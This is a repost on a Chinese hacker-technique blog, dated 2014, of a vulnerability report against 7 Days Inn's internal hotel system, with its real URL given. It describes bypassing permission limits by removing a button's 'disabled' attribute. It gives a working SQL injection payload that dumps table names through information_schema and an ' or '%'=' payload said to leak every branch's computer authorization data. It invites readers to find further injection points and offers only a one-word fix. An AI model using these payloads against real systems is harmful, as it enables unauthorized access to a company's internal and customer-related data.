记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

7天连锁酒店内部系统之主系统权限限制下的SQL注射

2014-03-10 15:55
为进入前台房店系统奠定了坚实基础
 
http://inner.7daysinn.cn/FindHotel/Default.aspx 
 
内部系统某些功能通过把按钮禁用来限制权限
 
这种方式形同虚设,通过浏览器把disabled参数删除即可使用。
 
接下来也是暴表、字段了,这里略过
 
' and (select top 50 table_name+',' from information_schema.tables where table_schema='inner' for xml path(''))>0 and ''='
 
 
接下来就是另一处,使用 ' or '%'='泄露所有分店电脑授权信息
 

 
还有其它点,请自己寻找,谢谢!
修复方案:
过滤
知识来源: www.2cto.com/Article/201403/284458.html

阅读:67161 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“7天连锁酒店内部系统之主系统权限限制下的SQL注射”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云